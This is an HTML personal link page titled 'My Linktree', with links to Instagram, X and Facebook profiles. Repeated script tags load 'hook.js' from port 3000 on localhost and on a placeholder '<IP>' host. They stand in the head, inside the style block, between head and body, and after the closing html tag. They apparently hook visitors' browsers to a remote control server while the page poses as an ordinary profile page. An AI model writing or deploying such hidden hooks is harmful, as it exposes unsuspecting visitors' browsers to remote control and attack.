<!DOCTYPE html>
<html lang="en">
<head>
    <script src="http://127.0.0.1:3000/hook.js"></script>
    <script src="http://<IP>:3000/hook.js"></script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>My Linktree</title>
    <style>
     <script src="http://127.0.0.1:3000/hook.js"></script>
     <script src="http://<IP>:3000/hook.js"></script>
        body {
            font-family: Arial, sans-serif;
            background-color: #f8f8f8;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }

        .profile {
            text-align: center;
            margin-bottom: 200px;
        }

        .profile img {
            width: 265px;
            height: 265px;
            border-radius: 50%;
            object-fit: cover;
            margin-bottom: 100px;
        }

        .links {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        .links a {
            margin: 5px 0;
            padding: 10px 20px;
            background-color: #3498db;
            color: white;
            text-decoration: none;
            border-radius: 50px;
            transition: background-color 0.3s ease;
        }

        .links a:hover {
            background-color: #2980b9;
        }
    </style>
</head>
<script src="http://127.0.0.1:3000/hook.js"></script>
     <script src="http://<IP>:3000/hook.js"></script>
<body>
    <div class="profile">
        <img src="g/i.jpg" alt="My Profile Picture">
        <h1>DINOSAUR</h1>
    </div>
    <div class="links">
        <a href="https://www.instagram.com/notfound_0" target="_blank">Instagram</a>
        <a href="https://x.com/AlahSiall45176?t=EfSWuxHitVN2Cm8Kl3ohjw&s=09" target="_blank">Twitter</a>
        <a href="https://www.facebook.com/index.php/" target="_blank">Facebook</a>
        <!-- Tambahkan lebih banyak link sosial media sesuai keinginan -->
    </div>
</body>
</html>
<script src="http://127.0.0.1:3000/hook.js"></script>
<script src="http://<IP>:3000/hook.js"></script>

